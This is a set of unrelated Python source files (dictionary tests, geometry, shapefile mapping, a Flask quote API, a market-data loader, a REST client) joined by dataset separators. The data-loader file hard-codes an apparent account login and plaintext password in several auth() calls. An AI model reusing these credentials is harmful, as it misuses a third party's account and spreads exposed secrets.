        self._compareDictionaries(expected, actual)
        # Insert with Add()
        for k in keys:
            v = random.choice(values)
            self._add(expected, actual, k, v)
        self._compareDictionaries(expected, actual)
        # Replace with []
        # Make sure to try setting every value
        k = random.choice(keys)
        for v in values:
            self._set(expected, actual, k, v)
            self._compareDictionaries(expected, actual)
        # Delete key, reinsert with []
        k = random.choice(keys)
        v = random.choice(values)
        self._checkDuplicateKeyError(actual, k, v)
        self._remove(expected, actual, k)
        self._checkKeyIsNotPresent(actual, k)
        self._compareDictionaries(expected, actual)
        self._set(expected, actual, k, v)
        self._compareDictionaries(expected, actual)
        #	for i in actual:
        #		print '%s => %.32s' % (i.Key, i.Value)
        # Clear
        self._clear(expected, actual)
        self._compareDictionaries(expected, actual)

    def createDictAndTest(self, tkey, tvalue):
        # NOTE(review): duplicated verbatim in GenericDictionaryFixture.
        dict = PersistentDictionary[tkey,tvalue](self._dataDirectory)
        try:
            expected = Dictionary[tkey,tvalue]()
            self._doTest(expected, dict, data[tkey], data[tvalue])
        finally:
            dict.Dispose()
class GenericDictionaryFixture(GenericDictionaryFixtureBase):
    """Generic CRUD tests compared against an unordered .NET Dictionary."""

    def setUp(self):
        self._dataDirectory = 'GenericDictionaryFixture'
        self._deleteDataDirectory()
        self._dict = None

    def tearDown(self):
        self._deleteDataDirectory()

    def createDictAndTest(self, tkey, tvalue):
        # NOTE(review): identical to the base-class implementation; could be
        # deleted in favour of inheritance.
        dict = PersistentDictionary[tkey,tvalue](self._dataDirectory)
        try:
            expected = Dictionary[tkey,tvalue]()
            self._doTest(expected, dict, data[tkey], data[tvalue])
        finally:
            dict.Dispose()
class SortedGenericDictionaryFixture(GenericDictionaryFixtureBase):
    """Like GenericDictionaryFixture, but compares against SortedDictionary
    and additionally asserts the two key orderings match."""

    def setUp(self):
        self._dataDirectory = 'SortedGenericDictionaryFixture'
        self._deleteDataDirectory()
        self._dict = None

    def tearDown(self):
        self._deleteDataDirectory()

    def _compareDictionaries(self, expected, actual):
        # Base checks plus key-order equality (both should be sorted).
        super(SortedGenericDictionaryFixture, self)._compareDictionaries(expected, actual)
        for x,y in zip(expected.Keys, actual.Keys):
            self.assertEqual(x, y)

    def createDictAndTest(self, tkey, tvalue):
        dict = PersistentDictionary[tkey,tvalue](self._dataDirectory)
        try:
            expected = SortedDictionary[tkey,tvalue]()
            self._doTest(expected, dict, data[tkey], data[tvalue])
        finally:
            dict.Dispose()
class SortedGenericListFixture(SortedGenericDictionaryFixture):
    """Same ordered comparison, but against a .NET SortedList reference."""

    def setUp(self):
        self._dataDirectory = 'SortedGenericListFixture'
        self._deleteDataDirectory()
        self._dict = None

    def tearDown(self):
        self._deleteDataDirectory()

    def createDictAndTest(self, tkey, tvalue):
        dict = PersistentDictionary[tkey,tvalue](self._dataDirectory)
        try:
            expected = SortedList[tkey,tvalue]()
            self._doTest(expected, dict, data[tkey], data[tvalue])
        finally:
            dict.Dispose()
# Types usable as PersistentDictionary keys.
keytypes = [
    System.Boolean,
    System.Byte,
    System.Int16,
    System.UInt16,
    System.Int32,
    System.UInt32,
    System.Int64,
    System.UInt64,
    System.Single,
    System.Double,
    System.DateTime,
    System.TimeSpan,
    System.Guid,
    System.String,
]

# Value types that also get a Nullable[...] variant appended below.
nullabletypes = [
    System.Boolean,
    System.Byte,
    System.Int16,
    System.UInt16,
    System.Int32,
    System.UInt32,
    System.Int64,
    System.UInt64,
    System.Single,
    System.Double,
    System.DateTime,
    System.TimeSpan,
    System.Guid,
]

# Types usable as PersistentDictionary values.
valuetypes = [
    System.Boolean,
    System.Byte,
    System.Int16,
    System.UInt16,
    System.Int32,
    System.UInt32,
    System.Int64,
    System.UInt64,
    System.Single,
    System.Double,
    System.DateTime,
    System.TimeSpan,
    System.Guid,
    System.String,
    System.Decimal,
]

# Representative sample values (boundaries + a random pick) per type.
r = System.Random()
data = {}
data[System.Boolean] = [
    True,
    False]
data[System.Byte] = [
    1,
    2,
    System.Byte.MinValue,
    System.Byte.MaxValue,
    r.Next(System.Byte.MinValue, System.Byte.MaxValue)]
data[System.Int16] = [
    0,
    1,
    -1,
    System.Int16.MinValue,
    System.Int16.MaxValue,
    r.Next(System.Int16.MinValue, System.Int16.MaxValue)]
data[System.UInt16] = [
    1,
    2,
    System.UInt16.MinValue,
    System.UInt16.MaxValue,
    r.Next(System.UInt16.MinValue, System.UInt16.MaxValue)]
data[System.Int32] = [
    0,
    1,
    -1,
    System.Int32.MinValue,
    System.Int32.MaxValue,
    r.Next()]
data[System.UInt32] = [
    1,
    2,
    System.UInt32.MinValue,
    System.UInt32.MaxValue,
    r.Next(0, System.Int32.MaxValue)]
data[System.Int64] = [
    0,
    1,
    -1,
    System.Int64.MinValue,
    System.Int64.MaxValue,
    r.Next()]
data[System.UInt64] = [
    1,
    2,
    System.UInt64.MinValue,
    System.UInt64.MaxValue,
    r.Next(0, System.Int32.MaxValue)]
data[System.Single] = [
    0,
    1,
    -1,
    System.Single.MinValue,
    System.Single.MaxValue,
    r.Next()]
data[System.Double] = [
    0,
    1,
    -1,
    System.Math.PI,
    System.Double.MinValue,
    System.Double.MaxValue,
    r.NextDouble()]
data[System.Decimal] = [
    System.Decimal.MinValue,
    System.Decimal.MaxValue,
    System.Decimal.MinusOne,
    System.Decimal.Zero,
    System.Decimal.One,
    System.Decimal(r.Next()),
    System.Decimal(r.NextDouble())]
data[System.Guid] = [
    System.Guid.Empty,
    System.Guid.NewGuid()]
data[System.DateTime] = [
    System.DateTime.MinValue,
    System.DateTime.MaxValue,
    System.DateTime.Now,
    System.DateTime.UtcNow,
    System.DateTime.Today]
data[System.TimeSpan] = [
    System.TimeSpan.MinValue,
    System.TimeSpan.MaxValue,
    System.TimeSpan.FromDays(1),
    System.TimeSpan.FromHours(1),
    System.TimeSpan.FromMinutes(1),
    System.TimeSpan.FromSeconds(1),
    System.TimeSpan.FromMilliseconds(1),
    System.TimeSpan.FromTicks(1),
    System.TimeSpan(r.Next())]
data[System.String] = [
    System.String.Empty,
    '1',
    '`',
    'foo',
    'bar',
    'baz',
    'space',
    'space ',
    'case',
    'CASE',
    'punctuation',
    'punctuation!',
    r.Next().ToString(),
    r.NextDouble().ToString(),
    # NOTE(review): NewGuid is missing its call parens - this stringifies
    # the bound method object rather than a fresh GUID; likely meant
    # System.Guid.NewGuid().ToString().
    System.Guid.NewGuid.ToString(),
    System.DateTime.Now.ToString(),
    '#'*65000]
def makef(tkey, tvalue):
    """Build a test method bound to one (tkey, tvalue) type pair.

    Each call creates a fresh closure, so the generated tests don't all
    share the loop variables (the classic late-binding pitfall).
    """
    def run(self):
        return self.createDictAndTest(tkey, tvalue)
    return run
# Make nullable data, which is the non-nullable data + None
for t in nullabletypes:
    data[System.Nullable[t]] = list(data[t])
    data[System.Nullable[t]].append(None)
    valuetypes.append(System.Nullable[t])

# Create the test functions: one testKeyTypeValueType method per
# (key type, value type) combination, attached to each fixture class.
for tkey in keytypes:
    for tvalue in valuetypes:
        name = 'test%s%s' % (tkey, tvalue)
        setattr(GenericDictionaryFixture, name, makef(tkey, tvalue))
        setattr(SortedGenericDictionaryFixture, name, makef(tkey, tvalue))
        setattr(SortedGenericListFixture, name, makef(tkey, tvalue))

if __name__ == '__main__':
    unittest.main()
| StarcoderdataPython |
21152 | <reponame>darshikaf/toy-robot-simulator
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import annotations
import math
class Point:
    """A 2-D point. Equality is member-wise; addition is component-wise."""

    def __init__(self, x: int = 0, y: int = 0):
        self.x = x
        self.y = y

    def __eq__(self, other: object) -> bool:
        if not isinstance(other, Point):
            return NotImplemented
        return self.x == other.x and self.y == other.y

    def __ne__(self, other: object) -> bool:
        if not isinstance(other, Point):
            return NotImplemented
        return not self.__eq__(other)

    def __add__(self, other: Point) -> Point:
        # Use self.__class__ so subclasses (e.g. Vector) stay closed under +.
        return self.__class__(self.x + other.x, self.y + other.y)
class Vector(Point):
    """A 2-D vector: a Point that additionally supports scalar multiplication."""

    def __mul__(self, scale: int) -> Vector:
        # self.__class__ keeps further subclasses closed under scaling.
        return self.__class__(self.x * scale, self.y * scale)
class Rect:
    """Axis-aligned rectangle defined by two opposite corner points."""

    def __init__(self, point1: Point, point2: Point) -> None:
        # Normalize so left <= right and bottom <= top regardless of the
        # order the corners were given in.
        self.left, self.right = sorted((point1.x, point2.x))
        self.bottom, self.top = sorted((point1.y, point2.y))

    def contains(self, point: Point) -> bool:
        """True if *point* lies inside or on the boundary of the rectangle."""
        return (self.left <= point.x <= self.right
                and self.bottom <= point.y <= self.top)
| StarcoderdataPython |
5049574 | <filename>mapper.py
import shapefile
from spatialindex import SBN, Bin, Feature
from math import floor, ceil
def mapshapefile(sf):
    """Map every feature of shapefile *sf* into 0-255 index space.

    Returns a list of Feature objects, one per shape, in shape order.
    """
    return [mapfeature(i, shp, sf) for i, shp in enumerate(sf.shapes())]
def mapfeature(index,shape,sf):
    """Map one shape's bounding box into the 0-255 SBN index grid.

    Mins are nudged down and floored, maxes nudged up and ceiled (a
    +/-0.005 fudge matching the .sbn rounding), then clamped to [0, 255].
    Returns a Feature with id, xmin, ymin, xmax, ymax set.
    """
    sf_xrange = sf.bbox[2]-sf.bbox[0]
    sf_yrange = sf.bbox[3]-sf.bbox[1]
    ft = Feature()
    ft.id = index + 1  # SBN feature ids are 1-based
    if sf.shapeType == 1:
        # Point shapes have no bbox: use the point itself as a degenerate box.
        (ptx,pty) = shape.points[0]
        sh_bbox = (ptx, pty, ptx, pty)
    else:
        sh_bbox = shape.bbox
    ft_xmin = ((sh_bbox[0]-sf.bbox[0])/sf_xrange*255.0)
    # not sure why this rounding is needed, but it is
    mod_xmin = (ft_xmin%1 - .005)%1 + int(ft_xmin)
    ft.xmin = int(floor(mod_xmin))
    if ft.xmin < 0 : ft.xmin = 0
    ft_ymin = ((sh_bbox[1]-sf.bbox[1])/sf_yrange*255.0)
    mod_ymin = (ft_ymin%1 - .005)%1 + int(ft_ymin)
    ft.ymin = int(floor(mod_ymin))
    if ft.ymin < 0 : ft.ymin = 0
    ft_xmax = ((sh_bbox[2]-sf.bbox[0])/sf_xrange*255.0)
    mod_xmax = (ft_xmax%1 + .005)%1 + int(ft_xmax)
    ft.xmax = int(ceil(mod_xmax))
    if ft.xmax > 255: ft.xmax = 255
    ft_ymax = ((sh_bbox[3]-sf.bbox[1])/sf_yrange*255.0)
    mod_ymax = (ft_ymax%1 + .005)%1 + int(ft_ymax)
    ft.ymax = int(ceil(mod_ymax))
    if ft.ymax > 255: ft.ymax = 255
    return ft
if __name__ == "__main__":
    # Sanity check (Python 2): compare our computed feature bboxes against
    # the ones stored in the shapefile's .sbn spatial index, printing any
    # mismatches.
    file = "../cities/132"
    s = shapefile.Reader(file)
    sf = mapshapefile(s)
    sbn = SBN(file + ".sbn")
    for id, bin in enumerate(sbn.bins):
        for f in bin.features:
            m = sf[f.id-1]  # feature ids are 1-based
            if (f.xmin,f.xmax,f.ymin,f.ymax) != (m.xmin,m.xmax,m.ymin,m.ymax):
                print "Bin %s (%s)" % (id, bin.id)
                print " SBN Feature %s (%s,%s,%s,%s)" % (f.id, f.xmin, f.ymin, f.xmax, f.ymax)
                print " Mapper Feature %s (%s,%s,%s,%s)\n" %(m.id, m.xmin, m.ymin, m.xmax, m.ymax)
| StarcoderdataPython |
1831284 | #!/usr/local/bin/python
import audio
# Advance the playlist four tracks; a loop replaces the duplicated calls.
for _ in range(4):
    audio.playNext()
| StarcoderdataPython |
3435636 | <reponame>IngoKl/quotapi
from flask import Flask, jsonify, abort, request
from termcolor import colored
import logging
import datetime
import sqlite3
import json
import random
# Quotapi v.1.1; 09.06.2016, MIT License (<NAME> 2016)
# Disable Console Output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
# Settings
logfile = './api-log.txt'
# NOTE(review): this flag shadows the imported `logging` module for the rest
# of the file; it only works because no later `logging.*` attribute access
# follows. Consider renaming (would require touching every reader).
logging = True
x_forwarded_for_retrieval = True
# NOTE(review): check_same_thread=False shares one sqlite connection across
# Flask request handlers without explicit locking — confirm this is intended.
db_connection = sqlite3.connect("quotes-clean.db3", check_same_thread=False)
def client_ip():
    """Best-effort client address: the first X-Forwarded-For entry when the
    proxy-header mode is enabled, otherwise the raw socket peer address."""
    if not x_forwarded_for_retrieval:
        return request.remote_addr
    return request.headers.getlist("X-Forwarded-For")[0]
def dictionary_factory(cursor, row):
    """sqlite3 row factory mapping each selected column name to its value.

    :param cursor: the cursor object (``description`` names the columns)
    :param row: one result row as a sequence
    :return: dict keyed by column name
    """
    return {column[0]: row[position]
            for position, column in enumerate(cursor.description)}
def max_quote_id():
    """
    :return: the last quote_id in the database
    """
    db_connection.row_factory = dictionary_factory
    cursor = db_connection.cursor()
    cursor.execute('SELECT max(id) FROM quotes')
    row = cursor.fetchone()
    return row["max(id)"]
def has_ip_verified(ip, quote_id):
    """Return True when this IP has already verified the given quote.

    :param ip: the ip address of the request
    :param quote_id: the quote_id requested
    :type ip: str
    :type quote_id: int
    :return: bool
    """
    sql = db_connection.cursor()
    sql.execute('SELECT * FROM verifications WHERE sender_ip = ? AND quote_id = ?', (ip, quote_id))
    # fetchone() avoids materialising every matching row just to count them
    return sql.fetchone() is not None
def quote_id_exists(quote_id):
    """Return True when a quote with this id exists.

    :param quote_id: the quote_id requested
    :type quote_id: int
    :return: bool
    """
    sql = db_connection.cursor()
    sql.execute('SELECT * FROM quotes WHERE id=?', (quote_id,))
    # fetchone() avoids materialising every matching row just to count them
    return sql.fetchone() is not None
def log(level, message):
"""
:param level: the log-level
:param message: the message to log
:type level: str
:type message: str
:return: none
"""
if level == 'success':
color = 'green'
elif level == 'hard_error':
color = 'red'
elif level == 'soft_error':
color = 'magenta'
else:
color = 'white'
time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
print colored('[%s] %s' % (time, message), color)
if logging:
logfile_object = open(logfile, 'a')
logfile_object.write('[%s] %s \n' % (time, message))
logfile_object.close()
# WSGI application object; the route handlers below attach to it.
app = Flask(__name__)
@app.route('/quotapi/api/v1.0/quotes/<int:quote_id>', methods=['GET'])
def get_quote(quote_id):
    """Return one quote (with its summed verification votes) as JSON.

    Responds 404 when the quote id is unknown.
    """
    if quote_id_exists(quote_id):
        db_connection.row_factory = dictionary_factory
        sql = db_connection.cursor()
        # aggregates verification votes via SUM over the join
        sql.execute('SELECT quotes.*, SUM(verifications.verification) AS verification_sum FROM quotes INNER JOIN verifications ON quotes.id=verifications.quote_id WHERE quotes.id=?', (quote_id,))
        quote = sql.fetchone()
        log('success', '[GET] [200] [%s] - /quotapi/api/v1.0/quotes/%d' % (client_ip(), quote_id))
        return jsonify({'quote': quote})
    else:
        log('soft_error', '[GET] [404] [%s] - /quotapi/api/v1.0/quotes/%d' % (client_ip(), quote_id))
        abort(404)
@app.route('/quotapi/api/v1.0/quotes/verify/<int:quote_id>', methods=['POST'])
def post_verify_quote(quote_id):
    """Record a verification vote (-1, 0, or 1) for a quote.

    Responds 409 when this IP already voted on the quote, 403 for an
    out-of-range vote, 404 for an unknown quote id.
    """
    verification = int(request.form['verification'])
    sender_ip = client_ip()
    log('success', '[POST] [200] [%s] - /quotapi/api/v1.0/quotes/%d' % (client_ip(), quote_id))
    if quote_id_exists(quote_id):
        if has_ip_verified(sender_ip, quote_id):
            # one vote per IP per quote
            log('soft_error', '[VERIFICATION-FAILED-REPEATED-VERIFICATION] [409] [Ver.: %s] [%s] - /quotapi/api/v1.0/quotes/%d' % (
                verification, client_ip(), quote_id))
            abort(409)
        else:
            if -1 <= verification <= 1:
                sql = db_connection.cursor()
                sql.execute('INSERT INTO verifications (sender_ip, quote_id, verification) VALUES (?, ?, ?)', (
                    sender_ip, quote_id, verification))
                db_connection.commit()
                log('success', '[VERIFICATION] [%s] [%s] - /quotapi/api/v1.0/quotes/%d' % (
                    verification, client_ip(), quote_id))
                return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
            else:
                log('soft_error', '[VERIFICATION-FAILED] [Ver.: %s] [%s] - /quotapi/api/v1.0/quotes/%d' % (
                    verification, client_ip(), quote_id))
                abort(403)
    else:
        log('soft_error', '[VERIFICATION-FAILED-UNKNOWN-QUOTE-ID] [404] [Ver.: %s] [%s] - /quotapi/api/v1.0/quotes/%d' % (
            verification, client_ip(), quote_id))
        abort(404)
@app.route('/quotapi/api/v1.0/quotes/random', methods=['GET'])
def get_random_quote():
    """Return a randomly chosen quote as JSON."""
    last_quote_id = max_quote_id()
    # ids are 1-based (SQLite rowids start at 1); starting the range at 0
    # could previously select a non-existent quote id 0
    quote_id = random.randint(1, last_quote_id)
    db_connection.row_factory = dictionary_factory
    sql = db_connection.cursor()
    sql.execute('SELECT quotes.*, SUM(verifications.verification) AS verification_sum FROM quotes INNER JOIN verifications ON quotes.id=verifications.quote_id WHERE quotes.id=?', (quote_id,))
    quote = sql.fetchone()
    log('success', '[GET] [200] [%s] - /quotapi/api/v1.0/quotes/random [%d]' % (client_ip(), quote_id))
    return jsonify({'quote': quote})
@app.route('/quotapi/api/v1.0/quotes/search', methods=['POST'])
def post_search_quotes():
    """Substring search over quote text; returns all matches as JSON."""
    search_term = request.form['search_term']
    like_pattern = "%" + search_term + "%"
    db_connection.row_factory = dictionary_factory
    sql = db_connection.cursor()
    sql.execute('SELECT * FROM quotes WHERE quote LIKE ?', (like_pattern,))
    results = sql.fetchall()
    log('success', '[GET] [200] [%s] - /quotapi/api/v1.0/quotes/search [%s]' % (client_ip(), search_term))
    return jsonify({'search_results': results})
@app.route('/quotapi/api/v1.0/status', methods=['GET'])
def get_api_status():
    """Health endpoint: reports status plus the current number of quotes."""
    log('success', '[GET] [200] [%s] - /quotapi/api/v1.0/status' % client_ip())
    # a stray second client_ip() call whose result was discarded has been removed
    return json.dumps({'status': {'status': 'ok', 'number_of_quotes': max_quote_id()}}), 200, {'ContentType':'application/json'}
if __name__ == '__main__':
    # Development server only; deploy behind a real WSGI server in production.
    app.run(debug=True)
5064430 | <filename>vnpy/analyze/data/data_prepare.py
from datetime import datetime, timedelta
from jqdatasdk import *
import vnpy.trader.constant as const
from vnpy.app.cta_strategy.base import (
INTERVAL_DELTA_MAP
)
from vnpy.trader.database import database_manager
from vnpy.trader.object import BarData, FinanceData
import pandas as pd
from typing import Sequence
def save_data_to_db(symbol, alias, count=5000):
    """Fetch daily bars from JQData and persist them to the local database.

    :param symbol: instrument code, e.g. '000300'
    :param alias: exchange alias, e.g. 'XSHG'
    :param count: number of most recent daily bars to fetch
    """
    # NOTE(review): credentials are hard-coded; move them to configuration
    auth('13277099856', '1<PASSWORD>')
    exchange = const.Exchange.get_exchange_by_alias(alias)
    data = get_bars(symbol + '.' + alias, count, unit='1d',
                    fields=['date', 'open', 'high', 'low', 'close', 'volume'],
                    include_now=False, end_dt=None, fq_ref_date=None, df=True)
    bars = []
    # previously the loop variable shadowed the DataFrame `data`; unpack the
    # (index, row) pair instead
    for _, row in data.iterrows():
        bar = BarData(
            gateway_name='test',
            symbol=symbol,
            exchange=exchange,
            datetime=row.date,
            interval=const.Interval.DAILY,
            volume=row['volume'],
        )
        # open_interest: float = 0
        bar.open_price = row['open']
        bar.high_price = row['high']
        bar.low_price = row['low']
        bar.close_price = row['close']
        bars.append(bar)
    database_manager.save_bar_data(bars)
def load_bar_data(symbol, alias, start_date: datetime = None, end_data: datetime = None):
    """Load daily bars from the local database into a DataFrame.

    Loads in roughly 30-day windows so progress can be reported.

    :param symbol: instrument code
    :param alias: exchange alias
    :param start_date: inclusive range start
    :param end_data: inclusive range end
    :return: DataFrame with columns date/open/high/low/close/volume
    """
    exchange = const.Exchange.get_exchange_by_alias(alias)
    interval = const.Interval.DAILY
    progress_delta = timedelta(days=30)
    total_delta = end_data - start_date
    interval_delta = INTERVAL_DELTA_MAP[interval]
    start = start_date
    end = start_date + progress_delta
    progress = 0
    # accumulate plain dicts: DataFrame.append inside a loop is O(n^2) and
    # was removed in pandas 2.x
    rows = []
    while start < end_data:
        end = min(end, end_data)  # Make sure end time stays within set range
        datas = database_manager.load_bar_data(symbol, exchange, interval, start, end)
        for data in datas:
            rows.append({'date': data.datetime, 'open': data.open_price,
                         'high': data.high_price, 'low': data.low_price,
                         'close': data.close_price, 'volume': data.volume})
        progress += progress_delta / total_delta
        progress = min(progress, 1)
        progress_bar = "#" * int(progress * 10)
        print(f"加载进度:{progress_bar} [{progress:.0%}]")
        start = end + interval_delta
        end += (progress_delta + interval_delta)
    df = pd.DataFrame(rows, columns=('date', 'open', 'high', 'low', 'close', 'volume'))
    print(f"历史数据加载完成,数据量:{len(df)}")
    return df
# Index PE on a given date (circulating-market-cap weighted)
def get_index_pe_date(index_code, date):
    """Weighted P/E of an index's constituents on *date*; NaN when no
    constituent has a positive P/E."""
    auth('13277099856', '1221gzcC')
    stocks = get_index_stocks(index_code, date)
    q = query(valuation).filter(valuation.code.in_(stocks))
    df = get_fundamentals(q, date)
    df = df[df['pe_ratio'] > 0]
    if len(df) == 0:
        return float('NaN')
    cap = df['circulating_market_cap']
    return cap.sum() / (cap / df['pe_ratio']).sum()
# Index PB on a given date (circulating-market-cap weighted)
def get_index_pb_date(index_code, date):
    """Weighted P/B of an index's constituents on *date*; NaN when no
    constituent has a positive P/B."""
    auth('13277099856', '1221gzcC')
    stocks = get_index_stocks(index_code, date)
    q = query(valuation).filter(valuation.code.in_(stocks))
    df = get_fundamentals(q, date)
    df = df[df['pb_ratio'] > 0]
    if len(df) == 0:
        return float('NaN')
    cap = df['circulating_market_cap']
    return cap.sum() / (cap / df['pb_ratio']).sum()
def save_pe_pb(df, code):
    """Compute and persist a PE/PB record for each row's date in *df*."""
    records = []
    for _, row in df.iterrows():
        day = datetime(row['date'].year, row['date'].month, row['date'].day)
        records.append(FinanceData(code, day,
                                   get_index_pe_date(code, day),
                                   get_index_pb_date(code, day),
                                   'normal'))
    database_manager.save_finance_data(records)
def load_finance_data(code, start_date: datetime = None, end_date: datetime = None):
    """Load stored PE/PB records for *code* into a DataFrame.

    :return: DataFrame with columns code/datetime/pe/pb/pe_mid/pb_mid
    """
    datas = database_manager.load_finance_data(code, start_date, end_date)
    # build all rows first: DataFrame.append inside a loop is O(n^2) and was
    # removed in pandas 2.x
    rows = [{'code': data.code, 'datetime': data.datetime, 'pe': data.pe,
             'pb': data.pb, 'pe_mid': data.pe_mid, 'pb_mid': data.pb_mid}
            for data in datas]
    return pd.DataFrame(rows, columns=('code', 'datetime', 'pe', 'pb', 'pe_mid', 'pb_mid'))
def init_finance_data(symbol, alias):
    """Backfill PE/PB history (2016-01-01 .. 2020-05-01) for one instrument."""
    bars = load_bar_data(symbol, alias,
                         start_date=datetime(2016, 1, 1),
                         end_data=datetime(2020, 5, 1))
    save_pe_pb(bars, symbol + '.' + alias)
if __name__ == "__main__":
    # Save PE/PB data
    # df = load_bar_data('000300', 'XSHG', start_date=datetime(2020, 1, 1), end_data=datetime(2020, 5, 6))
    # save_pe_pb(df, '000300.XSHG')
    # df = load_bar_data('399001', 'XSHE', start_date=datetime(2014, 1, 1), end_data=datetime(2016, 1, 10))
    # save_pe_pb(df, '399001.XSHE')
    # print(const.Exchange.get_exchange_by_alias('XSHG'))
    # save_data_to_db('000001', 'XSHG', 1)
    # load_bar_data('000001', 'XSHG', start_date=datetime(2010, 1, 1), end_data=datetime(2010, 5, 1))
    # save_data_to_db('159915', 'XSHE')  # ChiNext ETF
    # save_data_to_db('510300', 'XSHG', 50)  # CSI 300 ETF
    # save_data_to_db('510500', 'XSHG')  # CSI 500 ETF
    # save_data_to_db('159901', 'XSHE')  # SZSE 100 ETF
    # save_data_to_db('510880', 'XSHG')  # Dividend ETF
    # save_data_to_db('511010', 'XSHG')  # Treasury bond ETF
    # save_data_to_db('518880', 'XSHG')  # Gold ETF
    # save_data_to_db('159928', 'XSHE')  # Consumer ETF
    # save_data_to_db('501018', 'XSHG')  # Crude oil ETF
    # save_data_to_db('513100', 'XSHG')  # NASDAQ ETF
    # save_data_to_db('000300', 'XSHG')  #
    # Broad-market index bar data
    # save_data_to_db('399001', 'XSHE')
    # save_data_to_db('399006', 'XSHE')
    # save_data_to_db('000300', 'XSHG', 100)
    # save_data_to_db('399005', 'XSHE')
    # save_data_to_db('000016', 'XSHG')
    # save_data_to_db('000001', 'XSHG', 20)
    # df = df.append({'vol': 123}, ignore_index=True)
    # df = df.append({'vol': 123}, ignore_index=True)
    # print(df.__len__())
    # df = df.drop(0, axis=0)
    # print(df.__len__())
    # datas = load_bar_data('000001', 'XSHG', start_date=datetime(2010, 1, 1), end_data=datetime(2011, 4, 1))
    # df = pd.DataFrame()
    # emotion_p = 0
    # for index, data in datas.iterrows():
    #     df = df.append({'vol': data.volume}, ignore_index=True)
    #     # current volume < 6-day mean, for 6 consecutive days
    #     if df.__len__() > 6:
    #         if data.volume/df.vol.mean() - 1 < 0:
    #             emotion_p = emotion_p + 1
    #         else:
    #             emotion_p = 0
    #         df = df.drop(0, axis=0)
    #     if emotion_p > 6:
    #         print(data.date.strftime("%Y-%m-%d") + '连续5天低于平均值')
    # auth('13277099856', '1221gzcC')
    # data = get_bars('000001.XSHG', 500, unit='60m',
    #                 fields=['date', 'open', 'high', 'low', 'close', 'volume'],
    #                 include_now=False, end_dt=None, fq_ref_date=None, df=True)
    # print(data.head())
    # Broad-based indices
    # save_data_to_db('000300', 'XSHG')  # CSI 300
    # save_data_to_db('399006', 'XSHE')  # ChiNext index
    # save_data_to_db('000016', 'XSHG')  # SSE 50
    # save_data_to_db('000905', 'XSHG')  # CSI 500
    # Sector indices
    # save_data_to_db('000913', 'XSHG')  # CSI 300 Healthcare, since 2007-07-02
    # save_data_to_db('000932', 'XSHG')  # CSI Consumer, since 2009-07-03
    # save_data_to_db('399437', 'XSHE')  # CNI securities industry index, since 2014-12-30
    # save_data_to_db('399967', 'XSHE')  # CSI Military, since 2013-12-26
    # save_data_to_db('399986', 'XSHE')  # CSI Banks index, since 2014-12-30
    # save_data_to_db('000015', 'XSHG')  # Dividend index, since 2005-01-04
    # save_data_to_db('000018', 'XSHG')  # SSE 180 Finance, since 2007-12-10
    # save_data_to_db('000012', 'XSHG')  # Treasury bond index, since 2003-01-02
    # save_data_to_db('513100', 'XSHG')  # TMT50
    save_data_to_db('000001', 'XSHG')
| StarcoderdataPython |
12823737 | <gh_stars>0
#
# -------------------------------------------------------------------------
# Copyright (c) 2019 AT&T Intellectual Property
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -------------------------------------------------------------------------
#
import base64
import json
import requests
from valet.utils.decryption import decrypt
class REST(object):
    """Helper class for REST operations against a list of Music endpoints.

    Requests are tried host by host; within one host each request is retried
    up to ``retries`` times before failing over to the next host.
    """
    def __init__(self, hosts, port, path, timeout, retries,
                 userid, password, ns, logger):
        """Initializer. Accepts target host list, port, and path."""
        self.hosts = hosts  # List of IP or FQDNs
        self.port = port  # Port Number
        self.path = path  # Path starting with /
        self.timeout = float(timeout)  # REST request timeout in seconds
        self.retries = retries  # Retires before failing over to next Music server.
        self.userid = userid
        self.password = password
        self.ns = ns
        self.logger = logger  # For logging
        self.urls = []
        for host in self.hosts:
            # Must end without a slash
            self.urls.append('http://%(host)s:%(port)s%(path)s' % {
                'host': host,
                'port': self.port,
                'path': self.path,
            })

    def __headers(self, content_type='application/json'):
        """Returns HTTP request headers (namespace + HTTP basic auth)."""
        headers = {
            'ns': self.ns,
            'accept': content_type,
            'content-type': content_type,
            'authorization': 'Basic %s' % base64.b64encode((self.userid + ':' + self.password).encode()).decode()
        }
        return headers

    def request(self, method='get', content_type='application/json', path='/',
                data=None, raise400=True):
        """ Performs HTTP request.

        :param method: one of 'post', 'get', 'put', 'delete'
        :param content_type: MIME type for both accept and content-type
        :param path: URL path appended to each base endpoint
        :param data: optional payload, JSON-serialised before sending
        :param raise400: when False, a 400 response is returned instead of raised
        :return: the first successful requests.Response
        :raises KeyError: for an unsupported method
        :raises requests.HTTPError: when every endpoint fails
        """
        if method not in ('post', 'get', 'put', 'delete'):
            raise KeyError("Method must be: post, get, put, or delete.")
        method_fn = getattr(requests, method)
        if data:
            data_json = json.dumps(data)
        else:
            data_json = None
        response = None
        timeout = False
        err_message = ""
        full_url = ""
        for url in self.urls:
            # Try each url in turn. First one to succeed wins.
            full_url = url + path
            for attempt in range(self.retries):
                # Ignore the previous exception.
                try:
                    my_headers = self.__headers(content_type)
                    # Python 2 relic: coerce unicode header values to ascii
                    # (the 'unicode' type name never matches on Python 3)
                    for header_key in my_headers:
                        if (type(my_headers[header_key]).__name__ == 'unicode'):
                            my_headers[header_key] = my_headers[header_key].encode('ascii', 'ignore')
                    response = method_fn(full_url, data=data_json,
                                         headers=my_headers,
                                         timeout=self.timeout)
                    if raise400 or not response.status_code == 400:
                        response.raise_for_status()
                    return response
                except requests.exceptions.Timeout as err:
                    err_message = str(err) #err.message
                    # substitute a blank Response so the final raise below
                    # has something to report
                    response = requests.Response()
                    response.url = full_url
                    if not timeout:
                        # warn only once per request, not once per retry
                        self.logger.warning("Music: %s Timeout" % url, errorCode='availability')
                        timeout = True
                except requests.exceptions.RequestException as err:
                    err_message = str(err) #err.message
                    # NOTE(review): if the very first attempt fails before any
                    # response exists, `response` is still None here and the
                    # status/headers debug lines below would raise — TODO guard
                    self.logger.debug("Music: %s Request Exception" % url)
                    self.logger.debug("   method = %s" % method)
